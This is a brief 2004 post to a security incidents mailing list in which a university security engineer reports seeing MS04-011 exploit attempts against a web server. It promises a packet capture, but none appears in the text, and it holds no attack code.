Heads up: Looks like MS04-011 exploit is being tried against www.domain
From: James Riden (j.riden_at_massey.ac.nz)
Date: 04/27/04
To: incidents@securityfocus.com
Date: Tue, 27 Apr 2004 15:14:29 +1200
Seen as long ago as 25/04/2004. Haven't seen it used against any other
servers here, so it's obviously targeted in some way. Example packet
capture:
--
James Riden / j.riden@massey.ac.nz / Systems Security Engineer
GPG public key available at: http://www.massey.ac.nz/~jriden/
This post does not necessarily represent the views of my employer.